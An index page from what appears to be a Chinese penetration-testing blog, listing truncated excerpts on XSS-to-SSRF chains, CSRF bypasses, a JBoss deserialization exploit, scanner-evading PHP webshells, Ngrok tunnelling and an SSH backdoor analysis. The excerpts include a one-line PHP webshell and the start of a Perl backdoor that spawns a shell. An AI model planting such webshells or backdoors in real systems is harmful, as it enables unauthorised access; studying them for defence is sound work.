27 【转】XSS的威力:从XSS到SSRF再到Redis

fresh     2018.08.27     记录     抢沙发     414人打酱油
原文地址:https://www.anquanke.com/post/id/156377 前言 最近有空,想到曾经刷的 https://hackme.inndy.tw/scoreboard/ 还有一组新题没做,于是看了一下,发现是xss->ssrf->redi...

02 json格式csrf

fresh     2018.08.02     小工具     抢沙发     289人打酱油
最近有遇到严格校验了请求的csrf 可以利用swf和307跳转来达到效果 详情请参考:https://github.com/sp1d3r/swf_json_csrf 本站在线地址: http://www.fr1sh.com/11_tools/swf_json_csrf/...

23 【转】CVE-2017-12149 JBOOS AS 6.X 反序列化漏洞利用

fresh     2017.11.23     记录     抢沙发     3409人打酱油
文章来源:http://www.cnblogs.com/sevck/p/7874438.html 检测目录: 返回500一般就是存在了。 下载工具: http://scan.javasec.cn/java/JavaDeserH2HC.zip 使...

22 php webshell bypass D盾

fresh     2017.11.22     记录     抢沙发     483人打酱油
想法来自于:X_Al3r的文章https://bbs.ichunqiu.com/thread-28883-1-1.html 一句话的原型 assert($_GET[‘x’]); 0x00变量组合 1、字符串截取 <?php functiontest($D){ $a=substr(...

07 csrf+self-xss

fresh     2017.11.07     记录     抢沙发     418人打酱油
最近遇到一个存储型xss,存在与个人中心下收藏产品中,厂商认定为self-xss 后续想怎么继续利用下,发现添加收藏的地方存在csrf漏洞 思路如下: 通过csrf添加一个xsspayload在跳转页面到收藏页面触发xss漏洞 <formaction='http...

02 【转】CSRF 花式绕过Referer技巧

fresh     2017.11.02     记录     抢沙发     351人打酱油
0x01Referer为空的情况 解决方案: 利用ftp://,http://,https://,file://,javascript:,data:这个时候浏览器地址栏是file://开头的,如果这个HTML页面向任何http站点提交请求的话,这些请求的Referer都是空的。 例如利用...

02 【转】阿里云OSS约等于文件上传漏洞?

fresh     2017.11.02     记录     抢沙发     432人打酱油
转载来自于:http://pirogue.org/2017/09/29/aliyunoss/ 首先声明这是一篇标题党的文章,阿里云OSS不被这个锅,锅其实还是在企业或者说是用户。 前言 之所以要写这篇口水文,是因为最近在检测自家公司产品时发现存在这个问题,同时不久在测试某...

11 记一次应急响应(服务器日志分析)

fresh     2017.09.11     记录     抢沙发     866人打酱油
0x00介绍 某次接客户需求,说服务器近期经常重启,怀疑被攻击 分析思路:系统日志分析、windows崩溃文件分析 0x01系统日志 登陆失败日志,统计出攻击ip,以及对应时间节点,如果有部署网络流量,可结合网络流量进一步分析 系统重启日志 ...

10 【转载】Ngrok内网穿透的几种利用

fresh     2017.09.10     记录     抢沙发     514人打酱油
Ngrok的官方是这样介绍:一条命令解决的外网访问内网问题,本地WEB外网访问、本地开发微信、TCP端口转发。有tcp端口转发的功能,就尝试利用ngrok进行内网的穿透。Ngrok的网址:http://www.ngrok.cc/。 渗透的时候,有时候我们是内网,对方服务器也是内网,...

11 【转载】一款短小精致的SSH后门分析

fresh     2017.08.11     记录     抢沙发     568人打酱油
1、原理解释 这个ssh后门伪装成一个perl脚本,名为sshd,位于/usr/sbin/sshd,将系统原先的sshd移到/usr/bin下 sshd后门源码: #!/usr/bin/perl exec"/bin/sh"if(getpeername(STDIN)=~/^..z...
关闭